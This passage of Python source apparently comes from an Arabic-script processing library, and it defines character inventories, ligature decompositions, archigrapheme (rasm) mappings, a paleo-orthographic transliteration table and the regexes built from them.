    L = 'لݪࢦڸڵڶڷﻝﻞﻟﻠ'
    K = 'كکڪګگڰڲڳؼڮݤݢػڱݿڭڴݣﻙﻚﻛﻜﮎﮏﮐﮑﮒﮓﮔﮕ'
    # All inventoried characters, concatenated.
    CHAR = ''.join((Q, N, Y, A, B, G, R, D, T, C, S, F, E, W, H, M, L, K))
    # Word-final rasm letters that keep their own archigrapheme (Q/N/Y).
    RASM_QNY_MAPPING = {
        ** {c : 'Q' for c in Q},
        ** {c : 'N' for c in N},
        ** {c : 'Y' for c in Y},
    }
    # Glyph variant -> Latin archigrapheme (N/Y collapse into B, Q into F).
    RASM_MAPPING = {
        ** {c : 'B' for c in ''.join((N, Y, B))},
        ** {c : 'G' for c in G},
        ** {c : 'T' for c in T},
        ** {c : 'C' for c in C},
        ** {c : 'S' for c in S},
        ** {c : 'F' for c in ''.join((Q, F))},
        ** {c : 'E' for c in E},
        ** {c : 'H' for c in H},
        ** {c : 'M' for c in M},
        ** {c : 'L' for c in L},
        ** {c : 'K' for c in K},
        ** {c : 'A' for c in A},
        ** {c : 'R' for c in R},
        ** {c : 'D' for c in D},
        ** {c : 'W' for c in W}
    }
    # Normalisation of doubled short vowels into tanwin signs.
    NORM_MAPPING = {
        'ََ': 'ً',
        'ُُ': 'ٌ',
        'ِِ': 'ٍ',
    }
    NORM_REGEX = re.compile('|'.join(NORM_MAPPING))
    # Presentation-form ligature -> decomposed character sequence.
    CLUSTERS = {
        "ﯪ" : "ئا",
        "ﯫ" : "ئا",
        "ﯬ" : "ئە",
        "ﯭ" : "ئە",
        "ﯮ" : "ئو",
        "ﯯ" : "ئو",
        "ﯰ" : "ئۇ",
        "ﯱ" : "ئۇ",
        "ﯲ" : "ئۆ",
        "ﯳ" : "ئۆ",
        "ﯴ" : "ئۈ",
        "ﯵ" : "ئۈ",
        "ﯶ" : "ئې",
        "ﯷ" : "ئې",
        "ﯸ" : "ئې",
        "ﯹ" : "ئى",
        "ﯺ" : "ئى",
        "ﯻ" : "ئى",
        "ﰃ" : "ئى",
        "ﱨ" : "ئى",
        "ﰀ" : "ئج",
        "ﲗ" : "ئج",
        "ﰁ" : "ئح",
        "ﲘ" : "ئح",
        "ﰂ" : "ئم",
        "ﱦ" : "ئم",
        "ﲚ" : "ئم",
        "ﳟ" : "ئم",
        "ﰄ" : "ئي",
        "ﱩ" : "ئي",
        "ﰅ" : "بج",
        "ﲜ" : "بج",
        "ﰆ" : "بح",
        "ﲝ" : "بح",
        "ﰇ" : "بخ",
        "ﲞ" : "بخ",
        "ﰈ" : "بم",
        "ﱬ" : "بم",
        "ﲟ" : "بم",
        "ﳡ" : "بم",
        "ﰉ" : "بى",
        "ﱮ" : "بى",
        "ﰊ" : "بي",
        "ﱯ" : "بي",
        "ﰋ" : "تج",
        "ﲡ" : "تج",
        "ﰌ" : "تح",
        "ﲢ" : "تح",
        "ﰍ" : "تخ",
        "ﲣ" : "تخ",
        "ﰎ" : "تم",
        "ﱲ" : "تم",
        "ﲤ" : "تم",
        "ﳣ" : "تم",
        "ﰏ" : "تى",
        "ﱴ" : "تى",
        "ﰐ" : "تي",
        "ﱵ" : "تي",
        "ﰑ" : "ثج",
        "ﰒ" : "ثم",
        "ﱸ" : "ثم",
        "ﲦ" : "ثم",
        "ﳥ" : "ثم",
        "ﰓ" : "ثى",
        "ﱺ" : "ثى",
        "ﰔ" : "ثي",
        "ﱻ" : "ثي",
        "ﰕ" : "جح",
        "ﲧ" : "جح",
        "ﰖ" : "جم",
        "ﲨ" : "جم",
        "ﰗ" : "حج",
        "ﲩ" : "حج",
        "ﰘ" : "حم",
        "ﲪ" : "حم",
        "ﰙ" : "خج",
        "ﲫ" : "خج",
        "ﰚ" : "خح",
        "ﰛ" : "خم",
        "ﲬ" : "خم",
        "ﰜ" : "سج",
        "ﲭ" : "سج",
        "ﴴ" : "سج",
        "ﰝ" : "سح",
        "ﲮ" : "سح",
        "ﴵ" : "سح",
        "ﰞ" : "سخ",
        "ﲯ" : "سخ",
        "ﴶ" : "سخ",
        "ﰟ" : "سم",
        "ﲰ" : "سم",
        "ﳧ" : "سم",
        "ﰠ" : "صح",
        "ﲱ" : "صح",
        "ﰡ" : "صم",
        "ﲳ" : "صم",
        "ﰢ" : "ضج",
        "ﲴ" : "ضج",
        "ﰣ" : "ضح",
        "ﲵ" : "ضح",
        "ﰤ" : "ضخ",
        "ﲶ" : "ضخ",
        "ﰥ" : "ضم",
        "ﲷ" : "ضم",
        "ﰦ" : "طح",
        "ﲸ" : "طح",
        "ﰧ" : "طم",
        "ﴳ" : "طم",
        "ﴺ" : "طم",
        "ﰨ" : "ظم",
        "ﲹ" : "ظم",
        "ﴻ" : "ظم",
        "ﰩ" : "عج",
        "ﲺ" : "عج",
        "ﰪ" : "عم",
        "ﲻ" : "عم",
        "ﰫ" : "غج",
        "ﲼ" : "غج",
        "ﰬ" : "غم",
        "ﲽ" : "غم",
        "ﰭ" : "فج",
        "ﲾ" : "فج",
        "ﰮ" : "فح",
        "ﲿ" : "فح",
        "ﰯ" : "فخ",
        "ﳀ" : "فخ",
        "ﰰ" : "فم",
        "ﳁ" : "فم",
        "ﰱ" : "فى",
        "ﱼ" : "فى",
        "ﰲ" : "في",
        "ﱽ" : "في",
        "ﰳ" : "قح",
        "ﳂ" : "قح",
        "ﰴ" : "قم",
        "ﳃ" : "قم",
        "ﰵ" : "قى",
        "ﱾ" : "قى",
        "ﰶ" : "قي",
        "ﱿ" : "قي",
        "ﰷ" : "كا",
        "ﲀ" : "كا",
        "ﰸ" : "كج",
        "ﳄ" : "كج",
        "ﰹ" : "كح",
        "ﳅ" : "كح",
        "ﰺ" : "كخ",
        "ﳆ" : "كخ",
        "ﰻ" : "كل",
        "ﲁ" : "كل",
        "ﳇ" : "كل",
        "ﳫ" : "كل",
        "ﰼ" : "كم",
        "ﲂ" : "كم",
        "ﳈ" : "كم",
        "ﳬ" : "كم",
        "ﰽ" : "كى",
        "ﲃ" : "كى",
        "ﰾ" : "كي",
        "ﲄ" : "كي",
        "ﰿ" : "لج",
        "ﳉ" : "لج",
        "ﱀ" : "لح",
        "ﳊ" : "لح",
        "ﱁ" : "لخ",
        "ﳋ" : "لخ",
        "ﱂ" : "لم",
        "ﲅ" : "لم",
        "ﳌ" : "لم",
        "ﳭ" : "لم",
        "ﱃ" : "لى",
        "ﲆ" : "لى",
        "ﱄ" : "لي",
        "ﲇ" : "لي",
        "ﱅ" : "مج",
        "ﳎ" : "مج",
        "ﱆ" : "مح",
        "ﳏ" : "مح",
        "ﱇ" : "مخ",
        "ﳐ" : "مخ",
        "ﱈ" : "مم",
        "ﲉ" : "مم",
        "ﳑ" : "مم",
        "ﱉ" : "مى",
        "ﱊ" : "مي",
        "ﱋ" : "نج",
        "ﳒ" : "نج",
        "ﱌ" : "نح",
        "ﳓ" : "نح",
        "ﱍ" : "نخ",
        "ﳔ" : "نخ",
        "ﱎ" : "نم",
        "ﲌ" : "نم",
        "ﳕ" : "نم",
        "ﳮ" : "نم",
        "ﱏ" : "نى",
        "ﲎ" : "نى",
        "ﱐ" : "ني",
        "ﲏ" : "ني",
        "ﱑ" : "هج",
        "ﳗ" : "هج",
        "ﱒ" : "هم",
        "ﳘ" : "هم",
        "ﱓ" : "هى",
        "ﱔ" : "هي",
        "ﱕ" : "يج",
        "ﳚ" : "يج",
        "ﱖ" : "يح",
        "ﳛ" : "يح",
        "ﱗ" : "يخ",
        "ﳜ" : "يخ",
        "ﱘ" : "يم",
        "ﲓ" : "يم",
        "ﳝ" : "يم",
        "ﳰ" : "يم",
        "ﱙ" : "يى",
        "ﲕ" : "يى",
        "ﱚ" : "يي",
        "ﲖ" : "يي",
        "ﱛ" : "ذ",
        "ﱜ" : "ر",
        "ﱝ" : "ى",
        "ﲐ" : "ى",
        "ﱤ" : "ئر",
        "ﱥ" : "ئز",
        "ﱧ" : "ئن",
        "ﱪ" : "بر",
        "ﱫ" : "بز",
        "ﱭ" : "بن",
        "ﱰ" : "تر",
        "ﱱ" : "تز",
        "ﱳ" : "تن",
        "ﱶ" : "ثر",
        "ﱷ" : "ثز",
        "ﱹ" : "ثن",
        "ﲈ" : "ما",
        "ﲊ" : "نر",
        "ﲋ" : "نز",
        "ﲍ" : "نن",
        "ﲑ" : "ير",
        "ﲒ" : "يز",
        "ﲔ" : "ين",
        "ﲙ" : "ئخ",
        "ﲛ" : "ئه",
        "ﳠ" : "ئه",
        "ﲠ" : "به",
        "ﳢ" : "به",
        "ﲥ" : "ته",
        "ﳤ" : "ته",
        "ﲲ" : "صخ",
        "ﳍ" : "له",
        "ﳖ" : "نه",
        "ﳯ" : "نه",
        "ﳙ" : "ه",
        "ﳞ" : "يه",
        "ﳱ" : "يه",
        "ﳦ" : "ثه",
        "ﳨ" : "سه",
        "ﴱ" : "سه",
        "ﳩ" : "شم",
        "ﴌ" : "شم",
        "ﴨ" : "شم",
        "ﴰ" : "شم",
        "ﳪ" : "شه",
        "ﴲ" : "شه",
        "ﳵ" : "طى",
        "ﴑ" : "طى",
        "ﳶ" : "طي",
        "ﴒ" : "طي",
        "ﳷ" : "عى",
        "ﴓ" : "عى",
        "ﳸ" : "عي",
        "ﴔ" : "عي",
        "ﳹ" : "غى",
        "ﴕ" : "غى",
        "ﳺ" : "غي",
        "ﴖ" : "غي",
        "ﳻ" : "سى",
        "ﴗ" : "سى",
        "ﳼ" : "سي",
        "ﴘ" : "سي",
        "ﳽ" : "شى",
        "ﴙ" : "شى",
        "ﳾ" : "شي",
        "ﴚ" : "شي",
        "ﳿ" : "حى",
        "ﴛ" : "حى",
        "ﴀ" : "حي",
        "ﴜ" : "حي",
        "ﴁ" : "جى",
        "ﴝ" : "جى",
        "ﴂ" : "جي",
        "ﴞ" : "جي",
        "ﴃ" : "خى",
        "ﴟ" : "خى",
        "ﴄ" : "خي",
        "ﴠ" : "خي",
        "ﴅ" : "صى",
        "ﴡ" : "صى",
        "ﴆ" : "صي",
        "ﴢ" : "صي",
        "ﴇ" : "ضى",
        "ﴣ" : "ضى",
        "ﴈ" : "ضي",
        "ﴤ" : "ضي",
        "ﴉ" : "شج",
        "ﴥ" : "شج",
        "ﴭ" : "شج",
        "ﴷ" : "شج",
        "ﴊ" : "شح",
        "ﴦ" : "شح",
        "ﴮ" : "شح",
        "ﴸ" : "شح",
        "ﴋ" : "شخ",
        "ﴧ" : "شخ",
        "ﴯ" : "شخ",
        "ﴹ" : "شخ",
        "ﴍ" : "شر",
        "ﴩ" : "شر",
        "ﴎ" : "سر",
        "ﴪ" : "سر",
        "ﴏ" : "صر",
        "ﴫ" : "صر",
        "ﴐ" : "ضر",
        "ﴬ" : "ضر",
        "ﵐ" : "تجم",
        "ﵑ" : "تحج",
        "ﵒ" : "تحج",
        "ﵓ" : "تحم",
        "ﵔ" : "تخم",
        "ﵕ" : "تمج",
        "ﵖ" : "تمح",
        "ﵗ" : "تمخ",
        "ﵘ" : "جمح",
        "ﵙ" : "جمح",
        "ﵚ" : "حمي",
        "ﵛ" : "حمى",
        "ﵜ" : "سحج",
        "ﵝ" : "سجح",
        "ﵞ" : "سجى",
        "ﵟ" : "سمح",
        "ﵠ" : "سمح",
        "ﵡ" : "سمج",
        "ﵢ" : "سمم",
        "ﵣ" : "سمم",
        "ﵤ" : "صحح",
        "ﵥ" : "صحح",
        "ﵦ" : "صمم",
        "ﷅ" : "صمم",
        "ﵧ" : "شحم",
        "ﵨ" : "شحم",
        "ﵩ" : "شجي",
        "ﵪ" : "شمخ",
        "ﵫ" : "شمخ",
        "ﵬ" : "شمم",
        "ﵭ" : "شمم",
        "ﵮ" : "ضحى",
        "ﵯ" : "ضخم",
        "ﵰ" : "ضخم",
        "ﵱ" : "طمح",
        "ﵲ" : "طمح",
        "ﵳ" : "طمم",
        "ﵴ" : "طمي",
        "ﵵ" : "عجم",
        "ﷄ" : "عجم",
        "ﵶ" : "عمم",
        "ﵷ" : "عمم",
        "ﵸ" : "عمى",
        "ﵹ" : "غمم",
        "ﵺ" : "غمي",
        "ﵻ" : "غمى",
        "ﵼ" : "فخم",
        "ﵽ" : "فخم",
        "ﵾ" : "قمح",
        "ﶴ" : "قمح",
        "ﵿ" : "قمم",
        "ﶀ" : "لحم",
        "ﶵ" : "لحم",
        "ﶁ" : "لحي",
        "ﶂ" : "لحى",
        "ﶃ" : "لجج",
        "ﶄ" : "لجج",
        "ﶅ" : "لخم",
        "ﶆ" : "لخم",
        "ﶇ" : "لمح",
        "ﶈ" : "لمح",
        "ﶉ" : "محج",
        "ﶊ" : "محم",
        "ﶋ" : "محي",
        "ﶌ" : "مجح",
        "ﶍ" : "مجم",
        "ﶎ" : "مخج",
        "ﶏ" : "مخم",
        "ﶒ" : "مجخ",
        "ﶓ" : "همج",
        "ﶔ" : "همم",
        "ﶕ" : "نحم",
        "ﶖ" : "نحى",
        "ﶗ" : "نجم",
        "ﶘ" : "نجم",
        "ﶙ" : "نجى",
        "ﶚ" : "نمي",
        "ﶛ" : "نمى",
        "ﶜ" : "يمم",
        "ﶝ" : "يمم",
        "ﶞ" : "بخي",
        "ﶟ" : "تجي",
        "ﶠ" : "تجى",
        "ﶡ" : "تخي",
        "ﶢ" : "تخى",
        "ﶣ" : "تمي",
        "ﶤ" : "تمى",
        "ﶥ" : "جمي",
        "ﶦ" : "جحى",
        "ﶧ" : "جمى",
        "ﶨ" : "سخى",
        "ﶩ" : "صحي",
        "ﶪ" : "شحي",
        "ﶫ" : "ضحي",
        "ﶬ" : "لجي",
        "ﶭ" : "لمي",
        "ﶮ" : "يحي",
        "ﶯ" : "يجي",
        "ﶰ" : "يمي",
        "ﶱ" : "ممي",
        "ﶲ" : "قمي",
        "ﶳ" : "نحي",
        "ﶶ" : "عمي",
        "ﶷ" : "كمي",
        "ﶸ" : "نجح",
        "ﶽ" : "نجح",
        "ﶹ" : "مخي",
        "ﶺ" : "لجم",
        "ﶼ" : "لجم",
        "ﶻ" : "كمم",
        "ﷃ" : "كمم",
        "ﶾ" : "جحي",
        "ﶿ" : "حجي",
        "ﷀ" : "مجي",
        "ﷁ" : "فمي",
        "ﷂ" : "بحي",
        "ﷆ" : "سخي",
        "ﷇ" : "نجي",
        "ﻵ" : "لآ",
        "ﻶ" : "لآ",
        "ﻷ" : "لأ",
        "ﻸ" : "لأ",
        "ﻹ" : "لإ",
        "ﻺ" : "لإ",
        "ﻻ" : "لا",
        "ﻼ" : "لا",
        "ﷺ" : "صلى الله عليه وسلم",
        "﷽" : "بسم الله الرحمن الرحيم",
        "ﷲ" : "الله",
        "ﷳ" : "أكبر",
        "ﷴ" : "محمد",
        "ﷶ" : "رسول",
        "ﷷ" : "عليه",
        "ﷸ" : "وسلم",
        "ﷹ" : "صلى",
        "﷼" : "ریال",
        "ﷻ" : "جل جلاله",
        "ﷱ" : "قلے",
        "ﷰ" : "صلے",
        "ﷵ" : "صلعم",
    }
    # Character -> paleo-orthographic transliteration. Superscript/subscript
    # digits encode the number and position of the distinguishing dots.
    PALEO_MAPPING = {
        'ء' : 'ʔ' ,
        'أ' : 'اˀ' ,
        'ﺃ' : 'اˀ' ,
        'ﺄ' : 'اˀ' ,
        'ٲ' : 'اˀ' ,
        'ٵ' : 'اˀ' ,
        'إ' : 'اɂ' ,
        'ﺇ' : 'اɂ' ,
        'ﺈ' : 'اɂ' ,
        'ٳ' : 'اɂ' ,
        'ٱ' : 'اᵟ' ,
        'ﭐ' : 'اᵟ' ,
        'ﭑ' : 'اᵟ' ,
        # NOTE(review): the next two keys look identical; presumably one is
        # precomposed alif-madda and the other alif + combining madda —
        # both entries are preserved.
        'آ' : 'ا˜' ,
        'آ' : 'ا˜' ,
        'ﺁ' : 'ا˜' ,
        'ﺂ' : 'ا˜' ,
        'ﴼ' : 'اᵃⁿ',
        'ݳ' : 'ا۲', # Urdu/Persian encoding of Numerals
        'ݴ' : 'ا۳',
        'ࢥ' : 'ٯ₁' , # U+08a5 ARABIC LETTER QAF WITH DOT BELOW
        'ڧ' : 'ٯ¹' ,
        'ق' : 'ٯ²' ,
        'ڨ' : 'ٯ³' ,
        'ﻕ' : 'ٯ²' ,
        'ﻖ' : 'ٯ²' ,
        'ن' : 'ں¹' ,
        'ڹ' : 'ں₁' ,
        'ݧ' : 'ں₂' ,
        'ڽ' : 'ں³' ,
        'ﻥ' : 'ں¹' ,
        'ﻦ' : 'ں¹' ,
        'ڻ' : 'ںᵀ' ,
        'ڼ' : 'ںₒ' ,
        'ݨ' : 'ںᵀ¹' , # we encode from up to bottom
        'ݩ' : 'ںᵛ¹' ,
        'ي' : 'ی₂' , # U+064a Arabic ya (normalise to Persian ya)
        #'ی' : 'ی' , # U+06cc Farsi ya
        'ى' : 'ی' , # U+0649 Alif maqsura (normalise to Persian ya)
        'ې' : 'ی₂' ,
        'ۑ' : 'ی₃' ,
        'ؾ' : 'ی²' ,
        'ؿ' : 'ی³' ,
        'ﻲ' : 'ی₂' ,
        'ﮰ' : 'یˀ' ,
        'ﮱ' : 'یˀ' ,
        'ﺉ' : 'یˀ' ,
        'ﺊ' : 'یˀ' ,
        'ئ' : 'یˀ' ,
        'ۓ' : 'یˀ' ,
        'ݷ' : 'ی۴' ,
        'ؠ' : 'یₒ' ,
        'ؽ' : 'یᶺ' ,
        'ێ' : 'یᵛ' ,
        'ݵ' : 'ی۲' ,
        'ݶ' : 'ی۳' ,
        'ݺ' : 'ی۲' ,
        'ݻ' : 'ی۳' ,
        'ب' : 'ٮ₁' ,
        'ٻ' : 'ٮ₂' ,
        'ݐ' : 'ٮ₃' ,
        'پ' : 'ٮ₃' ,
        'ڀ' : 'ٮ₄' ,
        'ݒ' : 'ٮ₃' ,
        'ݔ' : 'ٮ¹₂' ,
        'ت' : 'ٮ²' , # we don't keep a distinction between this and the next
        'ٺ' : 'ٮ²' , # (there are other cases like this one)
        'ݓ' : 'ٮ²₃' ,
        'ث' : 'ٮ³' ,
        'ٽ' : 'ٮ³' ,
        'ٿ' : 'ٮ⁴' ,
        'ݑ' : 'ٮ³₁' ,
        'ﻧ' : 'ٮ¹' ,
        'ﻨ' : 'ٮ¹' ,
        'ﯾ' : 'ٮ₂' ,
        'ﯿ' : 'ٮ₂' ,
        'ﻳ' : 'ٮ₂' ,
        'ﻴ' : 'ٮ₂' ,
        'ﺋ' : 'ٮˀ' ,
        'ﺌ' : 'ٮˀ' ,
        'ﺏ' : 'ٮ₁' ,
        'ﺐ' : 'ٮ₁' ,
        'ﺑ' : 'ٮ₁' ,
        'ﺒ' : 'ٮ₁' ,
        'ﭖ' : 'ٮ₃' ,
        'ﭗ' : 'ٮ₃' ,
        'ﭘ' : 'ٮ₃' ,
        'ﭙ' : 'ٮ₃' ,
        'ﺕ' : 'ٮ²' ,
        'ﺖ' : 'ٮ²' ,
        'ﺗ' : 'ٮ²' ,
        'ﺘ' : 'ٮ²' ,
        'ﺙ' : 'ٮ³' ,
        'ﺚ' : 'ٮ³' ,
        'ﺛ' : 'ٮ³' ,
        'ﺜ' : 'ٮ³' ,
        'ࢬ' : 'ٮ₂' ,
        'ݕ' : 'ٮ‸' ,
        'ࢠ' : 'ٮᵥ' ,
        'ٹ' : 'ٮᵀ' ,
        'ݖ' : 'ٮᵛ' ,
        'ټ' : 'ٮₒ' ,
        'خ' : 'ح¹' ,
        'ج' : 'ح₁' ,
        'چ' : 'ح₃' ,
        'ڃ' : 'ح₂' ,
        'ڄ' : 'ح₂' ,
        'چ' : 'ح₃' ,
        'ڇ' : 'ح₄' ,
        'ݘ' : 'ح₃' ,
        'ڿ' : 'ح¹₃' ,
        'ڂ' : 'ح²' ,
        'ݗ' : 'ح²' ,
        'ࢢ' : 'ح₂' , # U+08a2 ARABIC LETTER JEEM WITH TWO DOTS ABOVE
        'څ' : 'ح³' ,
        'ﺝ' : 'ح₁' ,
        'ﺞ' : 'ح₁' ,
        'ﺟ' : 'ح₁' ,
        'ﺠ' : 'ح₁' ,
        'ﺥ' : 'ح¹' ,
        'ﺦ' : 'ح¹' ,
        'ﺧ' : 'ح¹' ,
        'ﺨ' : 'ح¹' ,
        'ﭺ' : 'ح₃' ,
        'ﭻ' : 'ح₃' ,
        'ﭼ' : 'ح₃' ,
        'ﭽ' : 'ح₃' ,
        'ځ' : 'حˀ' ,
        'ݮ' : 'حт' ,
        'ݼ' : 'ح۴' ,
        'ݯ' : 'حт₂' ,
        'ݲ' : 'حᵀ' ,
        'ز' : 'ر¹' ,
        'ڔ' : 'ر₁' ,
        'ݬ' : 'رˀ' ,
        'ږ' : 'ر¹₁' ,
        'ڗ' : 'ر²' ,
        'ݫ' : 'ر²' ,
        'ژ' : 'ر³' ,
        'ڙ' : 'ر⁴' ,
        'ﺯ' : 'ر¹' ,
        'ﺰ' : 'ر¹' ,
        'ﮊ' : 'ر³' ,
        'ﮋ' : 'ر³' ,
        'ړ' : 'رₒ' ,
        'ݛ' : 'ر₋' ,
        'ࢪ': 'ر' , # U+08aa ARABIC LETTER REH WITH LOOP
        'ڕ' : 'رᵥ' ,
        'ڑ' : 'رᵀ' ,
        'ڒ' : 'رᵛ' ,
        'ۯ' : 'رᶺ' ,
        'ݱ' : 'رᵀ²' ,
        'ذ' : 'د¹' ,
        'ڊ' : 'د₁' ,
        'ڍ' : 'د₂' ,
        'ڌ' : 'د²' ,
        'ڎ' : 'د³' ,
        'ڏ' : 'د³' ,
        'ڐ' : 'د⁴' ,
        'ﺫ' : 'د¹' ,
        'ﺬ' : 'د¹' ,
        'ڈ' : 'دᵀ' ,
        'ډ' : 'دₒ' ,
        'ݚ' : 'د‸' ,
        'ۮ' : 'دᶺ' ,
        'ڋ' : 'دᵀ₁' ,
        'ݙ' : 'دᵀ₂' ,
        'ظ' : 'ط¹' ,
        'ࢣ' : 'ط²' , # U+08a3 ARABIC LETTER TAH WITH TWO DOTS ABOVE
        'ڟ' : 'ط³' ,
        'ﻅ' : 'ط¹' ,
        'ﻆ' : 'ط¹' ,
        'ﻇ' : 'ط¹' ,
        'ﻈ' : 'ط¹' ,
        'ض' : 'ص¹' ,
        'ڝ' : 'ص₂' ,
        'ۻ' : 'ص¹₁' ,
        'ڞ' : 'ص³' ,
        'ﺽ' : 'ص¹' ,
        'ﺾ' : 'ص¹' ,
        'ﺿ' : 'ص¹' ,
        'ﻀ' : 'ص¹' ,
        'ش' : 'س³' ,
        'ڛ' : 'س₃' ,
        'ښ' : 'س¹₁' ,
        'ݭ' : 'س²' ,
        'ݜ' : 'س³' ,
        'ۺ' : 'س³₁' ,
        'ڜ' : 'س³₃' ,
        'ﺵ' : 'س³' ,
        'ﺶ' : 'س³' ,
        'ﺷ' : 'س³' ,
        'ﺸ' : 'س³' ,
        'ݽ' : 'س۴' ,
        'ݾ' : 'سᶺ' ,
        'ݰ' : 'سᵀ²' ,
        'ف' : 'ڡ¹' ,
        'ﻑ' : 'ڡ¹' ,
        'ﻒ' : 'ڡ¹' ,
        'ڢ' : 'ڡ₁' ,
        'ݠ' : 'ڡ₂' ,
        'ڥ' : 'ڡ₃' ,
        'ݡ' : 'ڡ₃' ,
        'ڣ' : 'ڡ¹₁' ,
        'ڤ' : 'ڡ³' ,
        'ڦ' : 'ڡ⁴' ,
        'ࢤ' : 'ڡ³₁' , # U+08a4 ARABIC LETTER FEH WITH DOT BELOW AND THREE DOTS ABOVE
        'ﻓ' : 'ڡ¹' ,
        'ﻔ' : 'ڡ¹' ,
        'ﻗ' : 'ڡ²' ,
        'ﻘ' : 'ڡ²' ,
        'غ' : 'ع¹' ,
        'ۼ' : 'ع¹₁' ,
        'ݝ' : 'ع²' ,
        'ݟ' : 'ع²' ,
        'ڠ' : 'ع³' ,
        'ݞ' : 'ع³' ,
        'ﻍ' : 'ع¹' ,
        'ﻎ' : 'ع¹' ,
        'ﻏ' : 'ع¹' ,
        'ﻐ' : 'ع¹' ,
        'ؤ' : 'وˀ' ,
        'ۏ' : 'و¹' ,
        'ۊ' : 'و²' ,
        'ۋ' : 'و³' ,
        'ﺅ' : 'وˀ' ,
        'ﺆ' : 'وˀ' ,
        'ۄ' : 'وₒ' , #FIXME
        'ۅ' : 'و₋' , #FIXME
        'ࢫ' : 'وₒ' , # U+08ab ARABIC LETTER WAW WITH DOT WITHIN #FIXME
        'ۆ' : 'وᵛ' ,
        'ۇ' : 'وᵠ' , #FIXME
        'ۈ' : 'و।' , #FIXME
        'ۉ' : 'وᶺ' ,
        'ݸ' : 'و۲' ,
        'ݹ' : 'و۳' ,
        'ۀ' : 'هˀ' ,
        'ۂ' : 'هˀ' ,
        'ة' : 'ه²' ,
        'ۃ' : 'ه²' ,
        'ﮤ' : 'هˀ' ,
        'ﮥ' : 'هˀ' ,
        'ﺓ' : 'ه²' ,
        'ﺔ' : 'ه²' ,
        'ۿ' : 'هᶺ' ,
        'ݦ' : 'م₁' ,
        'ݥ' : 'م¹' ,
        'ࢧ' : 'م³' , # U+08a7 ARABIC LETTER MEEM WITH THREE DOTS ABOVE
        'ڸ' : 'ل₃' ,
        'ڶ' : 'ل¹' ,
        'ڷ' : 'ل³' ,
        'ݪ' : 'ل₋' ,
        'ڵ' : 'لᵛ' ,
        'ؼ' : 'ك₃' ,
        'ڮ' : 'ك₃' ,
        'ݤ' : 'ك₃' ,
        'ݢ' : 'ك¹' ,
        'ػ' : 'ك²' ,
        'ݿ' : 'ك²ˀ' ,
        'ڭ' : 'ك³' ,
        'ݣ' : 'ك³' ,
        'ګ' : 'ك' , # FIXME
        'ڰ' : 'كᐟ' , #FIXME
        'ڲ' : 'كᐟ₂' ,
        'ڳ' : 'كᐟ₂' ,
        'ڱ' : 'ك²ᐟ' ,
        'ڴ' : 'ك³ᐟ' ,
        'گ' : 'كᐟ' ,
        'ﮓ' : 'كᐟ' ,
        'ﮔ' : 'كᐟ' ,
        'ﮕ' : 'كᐟ' ,
        'َ' : 'ᵃ' , # fatha
        'ً' : 'ᵃⁿ' , # fathatan
        'ࣰ' : 'ᵃᵃ' , # open fathatan
        'ُ' : 'ᵘ' , # damma
        'ٌ' : 'ᵘⁿ' , # dammatan
        'ࣱ' : 'ᵘᵘ' , # open dammatan
        'ِ' : 'ᵢ' , # kasra
        'ٍ' : 'ᵢₙ' , # kasratan
        'ࣲ' : 'ᵢᵢ' , # open kasratan
        'ّ' : 'ᵚ' , # sadda
        'ۡ' : 'ᵒ' , # quranic sukun
        'ْ' : 'ᵒ' , # normal sukun
        'ٓ' : '˜' , # madda
        'ۨ' : 'ᴺ' , # minuature nun above
        'ٰ' : 'ᴬ' , # dagger alif
        'ۜ' : 'ˢ' , # miniature sin above
        'ۣ' : 'ₛ' , # miniature sin below
        'ۢ' : 'ᵐ' , # minuature mim above #FIXME Mᴹᴍ Yyʏ
        'ۭ' : 'ₘ' , # # minuature mim below
        'ۥ' : 'ʷ' , # minuature waw
        'ۦ' : 'ʸ' , # miniature ya
        'ۧ' : 'ʸ' , # minuature ya above
        '۟' : '°' , # U+06df ARABIC SMALL HIGH ROUNDED ZERO - small circle | U+00B0 DEGREE SIGN
        # the letter is additional and should not be pronounced either in connection nor pause
        '۠' : '⁰' , # U+06e0 ARABIC SMALL HIGH UPRIGHT RECTANGULAR ZERO - oval sign
        # above an alif followed by a vowel letter, indicates that it is additional in consecutive reading
        # but should be pronounced in pause
        '۫' : '⌃' , # U+06eb ARABIC EMPTY CENTRE HIGH STOP | U+2303 (alt-08963) UP ARROWHEAD ; hapax تَأۡمَ۫نَّا
        '۪' : '⌄' , # U+06ea ARABIC EMPTY CENTRE LOW STOP | U+2304 DOWN ARROWHEAD ; hapax مَجۡر۪ىٰهَا
        '۬' : '•' , # U+06ec ARABIC ROUNDED HIGH STOP WITH FILLED CENTRE | U+2022 BULLET ; hapax ءَا۬عۡجَمِىࣱّ
        'ٔ' : 'ˀ' , # hamza above
        'ٕ' : 'ɂ' , # hamza below
        #'ـٔ ' : 'ˀ' , # U+0640 "ـ" tatweel is ALWAYS followed by hamza above, eg. ٱلۡأَفۡـِٔدَةِ 104:7:4,601:49,821:8:4
        # pausal marks
        'ۖ' : '⒮', # U+06d6 ARABIC SMALL HIGH LIGATURE SAD WITH LAM WITH ALEF MAKSURA
        'ۗ' : '⒬', # U+06d7 ARABIC SMALL HIGH LIGATURE QAF WITH LAM WITH ALEF MAKSURA
        'ۘ' : '⒨', # U+06d8 ARABIC SMALL HIGH MEEM INITIAL FORM
        'ۙ' : '⒧', # U+06d9 ARABIC SMALL HIGH LAM ALEF
        'ۚ' : '⒥', # U+06da ARABIC SMALL HIGH JEEM
        'ۛ' : '∴', # U+06db ARABIC SMALL HIGH THREE DOTS
    }
    # Compiled regexes, built from the inventories above at class creation.
    CLUSTERS_REGEX = re.compile('|'.join(CLUSTERS))
    CLEAN_REGEX = re.compile(fr'[^{CHAR}]')
    RASM_QNY_REGEX = re.compile(fr'({"|".join(RASM_QNY_MAPPING)})$')
    RASM_REGEX = re.compile(fr'[{"".join(RASM_MAPPING)}]')
    ABJAD_REGEX = re.compile('|'.join(ABJAD_MAPPING))
    PALEO_REGEX = re.compile('|'.join(PALEO_MAPPING))
    PALEO_N_REGEX = re.compile(fr'[ںنڻڼڹݧݨݩڽﻥﻦ](?=[^{CHAR}]*$)')
    PALEO_Q_REGEX = re.compile(fr'[ٯࢥڧقڨﻕﻖ](?=[^{CHAR}N]*$)')
    PALEO_Y_REGEX = re.compile(fr'[ىیۍݷيېۑؠئؽێݵݶࢨࢩؾؿےۓݺݻﻯﻰﮮﮯﯼﯽﻲﮰﮱﺉﺊ](?=[^{CHAR}NQ]*$)')
    CREAN_RASM_REGEX = re.compile(r'[^A-Y ]')
    # separate blocks in archigraphemic representation
    ARDW_REGEX = re.compile(r'([ARDW][^QNYABGRDTCSFEWHMLK]*)')
